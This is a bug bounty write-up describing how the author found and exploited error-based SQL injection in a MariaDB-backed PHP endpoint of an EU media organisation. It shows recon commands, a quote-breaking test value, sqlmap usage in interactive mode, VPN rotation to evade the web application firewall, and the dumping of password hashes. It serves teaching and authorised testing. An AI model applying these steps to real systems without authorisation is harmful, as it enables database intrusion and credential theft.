Exploiting SQL Error SQLSTATE[42000] To Own MariaDB of A Large Online Media Leader

nav1n
InfoSec Write-ups
Published in
8 min readMay 20, 2023

--

I recently received a private invitation to hack into an EU-based Online Media and Entertainment organization. The target’s scope wasn’t extensive, but it did include a wildcard scope on a main website specific to an EU country, as well as a few web-apps and proprietary tools.

As I always say and do, I choose targets with the largest possible scope. However, this particular target isn’t significant enough to capture my interest. Nevertheless, the bounty table caught my attention, particularly the high and critical bounties of $5000 and $10000, respectively, therefore, I have decided to accept the invitation.

SQL Injection in MariaDB

Reckoning Process:

As you may already know, my process and methodology for reconnaissance are quite straightforward. I begin by performing subdomain enumeration using various certificate transparency search tools such as crt.sh, Facebook’s certificate transparency monitoring tool, Netlas.io, and others.

When using crt.sh and Facebook’s CT monitoring tool, the process is relatively simple. However, with Netlas, I employ the following queries to obtain as many endpoints as possible:

https://app.netlas.io/certs/?q=certificate.subject.organizational_unit:"Org 
Name"&page=1&indices=

And using some regex :

domain:/(.*\.)?domain\.[a-z0-9-]*/

While the regex mentioned above can yield a large amount of data depending on the target, however, its usefulness is limited to cases where the target scope is focused on country code top-level domains (cTLDs) or other common top-level domains like info, net, io, com, and so on.

After gathering a list of subdomains, the next step is to filter out duplicates. Once that is done, I processed the list using SubFinder, using the following script:

subfinder --all -dL sub.list | httpx -o ~/final-sublist-httpx.txt

The script mentioned above takes a list of subdomains and using SubFinder to perform a passive subdomain probe. Subsequently, HTTPX is used to do HTTP probing, and the results are saved as “final-sublist-httpx.txt”.

From the final list obtained, now I can initiate a bulk ParamSpider scan using the following command:

cat ~/final-sublist-httpx.txt | xargs -I % python3 ~/ParamSpider/paramspider.py -l high -o ./out/% -d % ;
ParamSpider Bulk URL Scanning

After completing the parameter scraping process, I moved on to the next step of manually inspecting the discovered URLs. This manual inspection is essential in identifying long URLs that contain multiple parameters. I always look for longer URLS as they let me to inject payloads into various parameters within the url.

While examining the URLs, I made the decision to focus on PHP endpoints, as I’m confident in my ability to discover potential vulnerabilities such as XSS, SQLi, or SSRF in PHP based webapps.

To streamline my approach, I sorted the URLs based on their .php extensions, this resulted in another new file containing over 300 URLs with PHP endpoints.

EyeWitness Everything

To my knowledge, visual inspection of the targets is often the best approach in the reconnaissance process. By personally examining the targets, one can determine if further analysis is necessary. Certain pages, such as blank pages, login screens, 403 pages, IIS default pages, RDP logins, or PHPInfo pages, can potentially be vulnerable or possibilities of disclosing sensitive information, so it is important to consider them during an assessment.

To efficiently inspect the URLs, I have two options: opening and analyzing each URL individually or utilizing automated screenshot tools like EyeWitness. In this case, I opted to use EyeWitness. After running EyeWitness against the URLs and collecting the screenshots, from the result it generated, I opened them and began analyzing the pages one by one.

Initially, nothing stood out until I encountered the endpoint with ajax.php, which displayed an output as shown in the below screenshot. Recognizing its potential significance, I copied the link and submitted it through WaybackURLs for further investigation.

─# waybackurls -dates https://sub.domain.com/foo/bar/ajax.php

Upon retrieving approximately 25–30 lines of archived data from WaybackURLs, I proceeded to examine the URLs. It became apparent that these URLs represented past queries that had been made on the target website. Recognizing their potential relevance, I copied them to my Burp Suite and sent them to the repeater tab for further analysis and testing.

After sending the request through Burp Suite’s repeater tab, I received a different response than expected, as depicted in the screenshot. I recognized this discrepancy because my request originated from intercepting the browser, ensuring that the request included the appropriate cookie and PHP session ID.

The differing response suggests that the server might be employing some form of dynamic behavior or session-based logic, resulting in varying outcomes based on the presence or absence of specific cookies or session IDs. This discovery highlights the potential for further investigation and exploitation of the website’s functionality.

SQLSTATE[42000]: Syntax Error:

The URL I was examining contained approximately 15 parameters, and I began experimenting with each of them by sending them to Burp Collaborator with SQLi payloads. However, regardless of the payload I used, the response remained consistent. This indicated that the server was likely properly handling the majority of the parameters.

Nevertheless, I persisted in testing all the parameters until I came across the parameter “&***sales_ref=[123],” which appeared to be some kind of sales reference. Despite being unsure about its exact purpose, I decided to send the payload “&***sales_ref=[‘“123], and to my surprise, I encountered an “SQL error SQLSTATE[42000]: Syntax Error:…. “in the response.

I know that, this finding suggests a potential SQL injection vulnerability within the sales_ref parameter.

In that moment, with the discovery of the SQL error and the realization of a potential vulnerability within the database or web application, I felt a sense of victory. I decided to pause the ongoing activities, including the scanning in Burp Suite and other scanning tools like dalfox.

Taking a moment to appreciate the progress made, I took a deep breath and treated myself to a cup of coffee before returning to my desk.

The SQL error message, “SQLSTATE[42000]: Syntax error or access violation…,” indicated that there was indeed a vulnerability present within the database or web application. This was the very outcome I had been searching for during my reconnaissance process.

The Error Message:

{“success”:***,”**”:**,”****”:”SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘’\”) ******”}

I switched-on my VPN, copied the URL from burp repeater and visited the page in your browser to confirm that the SQL error was still present. I did this to confirmed that the error persisted, providing additional validation for the existence of the vulnerability I had identified earlier. This served as a crucial step in verifying the vulnerability’s persistence and readiness for further investigation.

Note: Switching between different VPN locations helps mitigate the risk of the Web Application Firewall (WAF) blacklisting your IP address. While testing a few SQLi payloads within a regular interval may not raise suspicion, conducting bulk testing or running automated scripts can potentially trigger security measures. By consistently using a VPN, I ensure I can continue my testing and investigation without hindrance or unwanted attention form Mr. WAF.

SQL MAP

As I knew that the database was vulnerable to Error-based SQL Injection, I proceeded by copying the request file and initiating SQLMap. In the first run of SQLMap without specifying any parameters, it failed to detect any SQL injection. I then ran the script again, this time using the `-p xxxsales_ref` parameter, but SQLMap still couldn’t detect any SQL injection vulnerabilities.

This wasan incredibly frustrating situation. I’m at a loss as to why SQLmap is failing despite my attempts. I’ve tried testing with multiple tamper scripts, adjusting the delay and detection level, and yet SQLMap isn’t detecting anything substantial, even though it recognizes the possibility of injection.

I considered utilizing Ghauri as an alternative testing tool, but unfortunately, it is not proficient in handling Ajax parameters, which are vital in this context.

SQL MAP — but manual mode

Since automated SQLMap failed, with the intention of taking a more manual approach, I made the decision to run SQLmap directly using the URL. I copied the GET request and executed SQLmap without the “-batch” flag, which allows for interactive mode and provides more control and flexibility during the scanning process.

During the process of working with Ajax/JSON based parameters, I came to the realization that SQLMap, by default, does not inject payloads within those boundaries. When the “-batch” flag is used, SQLMap automatically skips these parameters, leading to the absence of injection detection. This explains why SQLMap was unable to find any injections in my previous attempts.

In the third round of testing, I used SQLMap in manual mode by providing the URL directly. This time, when prompted by SQLMap, I actively selected “yes” to indicate my intention to inject payloads within the parameter boundaries, as demonstrated in the accompanying screenshot. By doing so, I ensured that SQLMap would thoroughly test and explore potential injection points within the specified parameters.

Within a few minutes of running SQLMap with the specified configuration, the tool successfully detected four types of SQL injections: boolean-based blind, error-based, stacked queries, and time-based blind. This discovery highlights the vulnerability of the target database to various injection techniques.

Additionally, SQLMap as well identified another parameter that was previously tested manually and confirmed its vulnerable. These findings provide valuable insights into the potential attack surface and emphasize the importance of thorough vulnerability testing.

As I wanted to increase the severity, I proceeded to dump the password hashes from the compromised database. This action allowed me to obtain sensitive information that could potentially be used to gain unauthorized access to users/ administrator accounts.

The following day, my report underwent triaging, and within the following week, I received a bounty of $3,000.

Since the bounty was not as I expected, I inquired about the reasoning behind it. In response, the triager explained that the subdomain I exploited had less impact on the organization, as it did not contain personally identifiable information (PII) or critical business data. Instead, it primarily contained sales leads generated from page clicks, which were utilized for analysis by the sales team.

Although I couldn’t independently verify this information, I accepted the explanation and the $3,000 bounty with contentment and appreciation for the reward I received.

That’s all for now, thank you for reading.

NS

Follow me on twitter: https://twitter.com/nav1n0x

--

--